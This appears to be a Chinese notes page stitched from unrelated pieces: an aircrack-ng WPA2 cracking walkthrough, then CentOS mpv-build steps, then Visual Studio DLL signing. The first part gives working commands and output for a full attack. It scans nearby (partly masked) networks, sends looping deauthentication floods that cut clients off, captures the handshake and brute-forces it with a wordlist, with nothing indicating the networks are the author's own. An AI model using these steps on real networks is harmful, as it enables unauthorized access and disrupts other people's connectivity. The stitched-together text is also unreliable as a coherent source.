aircrack 使用方法

使用aircrack-ng抓包
iwconfig命令查看无线网卡有没有加载成功,如图,出现了wlan0的无线设备,即为加载成功
root@kali:~# iwconfig
lo        no wireless extensions.

wlan0     IEEE 802.11bgn  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
eth0      no wireless extensions.


查看周围网络
airodump-ng wlan0 
很多情况下会发生如下所示的报错:“ioctl(SIOCSIWMODE) failed: Device or resource busy”
这种情况我们需要先卸载设备,然后设置monitor模式,重新启用即可!命令:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

运行完这三个命令后再次运行airodump wlan0,查看需要破解的网在哪个频道(CH),数据传输量(Beacons)如何。
 CH  9 ][ Elapsed: 1 min ][ 2017-01-12 23:00                         
                                                             
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                             
 A4:****            -56       40       82    0  11  54e. WPA2 CCMP   PSK  M***ie         
 08:****            -63      200        0    0   6  54e  WPA2 CCMP   PSK  N***ore_A**0BF 
 1C:****            -64       25      331    0   6  54e. WPA2 CCMP   PSK  T***S          
 F0:****            -64       18      797    0  11  54e  WPA2 CCMP   PSK  X***mi_8029    
 C8:****            -76       13        0    0   9  54e  WPA2 CCMP   PSK  Z***           
 E4:****            -80       19        0    0  11  54e. WPA2 CCMP   PSK  6***           
 E4:****            -84       14      215    0  13  54e  WPA2 CCMP   PSK  M***URY_1F04   
 EC:****            -84       13        0    0   1  54e. WPA2 CCMP   PSK  k***board      
 1C:****            -86       14        1    0   1  54e. WPA2 CCMP   PSK  T***INK_F369DE 
 C8:****            -88       10       36    0  10  54e  WPA2 CCMP   PSK  T***a_5021     
 F0:****            -86       10        0    0   3  54e  WPA2 CCMP   PSK  X***mi_B37C    
 04:****            -88        6        0    0   1  54e. WPA2 CCMP   PSK  J***322BEC     
 D0:****            -89       11        0    0  11  54e. OPN              <***gth:  0>   
 88:****            -90        4        0    0  11  54e. WPA2 CCMP   PSK  z***yi         
 C4:****            -92        2        0    0  13  54e. WPA2 CCMP   PSK  D***nk_DIR-223 
 80:****            -94        5        0    0   6  54e. WPA2 CCMP   PSK  w***-8018      
 88:****            -94        6        0    0  11  54e. WPA2 CCMP   PSK  L***ndinter    
 8E:****            -94        4        0    0  11  54e. WPA2 CCMP   PSK  A***           
 30:****            -95        4        0    0  11  54e. WPA2 CCMP   PSK  J***u-NET      
 1C:****            -98        3        0    0  11  54e. WPA2 CCMP   PSK  M***URY_18C0   
 14:****            -95        2        0    0  11  54e. WPA2 CCMP   PSK  T***INK_8082   
 30:****            -96        3        0    0   6  54e. WPA2 CCMP   PSK  T***INK_6A28   
 D0:****            -89        4        0    0  11  54e. WPA2 CCMP   PSK  3***ifi-QCMHZY-2.4G
                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
                                                                            
 A4:****            B8:****            -72    0 -24e     0        7  
 A4:****            80:****            -90    1e- 1      0       75  
 08:****            DC:****            -26    0 -24e    18       33  
 08:****            54:****            -42    0 - 1      0       17  N**re_A***BF
 1C:****            94:****            -74    0e- 1      0      332     
 
 
接下来开始抓我们想要的包:
airodump-ng -w sniffer -c 11 wlan0
解释:-w表示保存握手包,“sniffer”为包的名称,可随意设置,最终的文件为sniffer-01.cap,-c 3表示指定频道11,wlan0指定网卡设备。

当然我们也可以指定破解我们想要的AP
airodump-ng -w sniffer -c 11 --bssid F0:B4:**** wlan0
解释:--bssid嗅探指定无线AP,后面跟着AP的bssid,如下图
这时候可以等待握手包的获取。

为了加速握手包的获取,我们可以使用aireplay来给AP发送断开包:
root@kali:~# aireplay-ng -0 0 -a F0:B4:**** wlan0
解释:-0为模式中的一种:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网,-a 指定无线AP的mac地址,即为该无线网的bssid值
23:26:08  Waiting for beacon frame (BSSID: F0:B4:****) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c ).
23:26:08  Sending DeAuth to broadcast -- BSSID: [F0:B4:****]
23:26:09  Sending DeAuth to broadcast -- BSSID: [F0:B4:****]
23:26:09  Sending DeAuth to broadcast -- BSSID: [F0:B4:****]
23:26:10  Sending DeAuth to broadcast -- BSSID: [F0:B4:****]

若上一步的窗口右上角中出现握手包,WPA handshake: F0:B4:**** 后面跟着bssid,即为抓到了该无线网的握手包,我们可以使用CTRL+C来停止嗅探握手包。

如果始终没有出现握手包,则可以尝试加入客户端的mac:
root@kali:~# aireplay-ng -0 0 -a F0:B4:**** -c 3C:33:**** wlan0
23:28:57  Waiting for beacon frame (BSSID: F0:B4:****) on channel 11
23:28:57  Sending 64 directed DeAuth. STMAC: [3C:33:****] [ 5|64 ACKs]
23:28:58  Sending 64 directed DeAuth. STMAC: [3C:33:****] [ 0|52 ACKs]
23:28:59  Sending 64 directed DeAuth. STMAC: [3C:33:****] [52|59 ACKs]


使用字典爆破握手包
这一步是整个密码破解的关键,能否成功,取决与你的CPU是否强大,还有你字典的大小,以及字典的质量,密码的复杂程度。
aircrack-ng sniffer-01.cap -w /mnt/hgfs/D/Downloads/1.txt
解释:“sniffer-01.cap”为指定我们需要破解的握手包,直接写文件名表示文件在当前文件夹下,"-w"指定字典文件后面跟着字典的路径。
                                 Aircrack-ng 1.2 rc4

      [00:01:29] 56836/276301591 keys tested (661.85 k/s) 

      Time left: 4 days, 20 hours, 5 minutes, 19 seconds         0.02%

                       Current passphrase: 000055885588               


      Master Key     : C9 8F 1E DA 11 AB E1 22 05 C0 CF 4B 39 BC 11 DF 
                       BA AE 04 FE 5C D9 BC 5D 37 12 78 B7 2C 26 C0 FF 

      Transient Key  : 05 A6 DB 82 4D 1C 42 AA D3 A9 DB 15 D6 CD 73 FB 
                       CB A5 34 2B 5D 9A 59 3C 3B A7 7D 2C 75 05 9F 89 
                       BA 3D 3F C6 2C C4 A4 84 83 45 AE 78 7E 0A 77 0F 
                       41 DD 35 48 09 99 13 EA D6 80 BD 17 AE D2 E3 C8 

      EAPOL HMAC     : 28 8D 48 F4 1D 48 E9 AC B9 FF B1 CB CF 8F 88 EB 

CentOS 7 编译 mpv-player

yum install libtool freetype freetype-devel fribidi fribidi-devel yasm mesa-libGL mesa-libGL-devel
yum install fdk-aac fdk-aac-devel lame-libs lame-devel x264-libs x264-devel


git clone https://github.com/mpv-player/mpv-build.git
cd mpv-build
echo --enable-libx264 >> ffmpeg_options
echo --enable-libmp3lame >> ffmpeg_options
echo --enable-libfdk-aac >> ffmpeg_options
./rebuild -j4
The -j4 asks it to use 4 parallel processes.
sudo ./install


Error:
configure: error: Either DirectWrite (on Windows), CoreText (on OSX), or Fontconfig (Linux, other) is required. If you really want to compile without a system font provider, add --disable-require-system-font-provider
Solve:
yum install fontconfig fontconfig-devel




optional:
install ffmpeg    https://li.nux.ro/repos.html
yum -y install epel-release && rpm -Uvh http://li.nux.ro/download/nux/dextop/el7/x86_64/nux-dextop-release-0-5.el7.nux.noarch.rpm
yum install ffmpeg

vs 给 dll 签名

打开VS Tools工具命令

第一步:生成随机密钥对
sn -k DllName.snk

第二步:将DLL文件反编译成IL中间语言文件
生成的结果文件为xxx.il,xxx.res
cd release\
ildasm DllName.dll /out:DllName.il
rename DllName.dll to DllName.dll.bak

第三步:将签名密钥写入到DLL中。(注意dll文件名是否重名,可以先写一个不冲突名称合成dll,然后再修改)
ilasm DllName.il /res:DllName.res /dll /key:DllName.snk /out:DllName.dll

第四步:检查刚才签名是否正确有效。
sn -vf DllName.dll

特别注意:在签名DLL的时候路径一定不要太长,否则任何一步操作都会失败。最好在磁盘根目录下创建一个文件夹,将需要签名的DLL放到这里进行签名合成。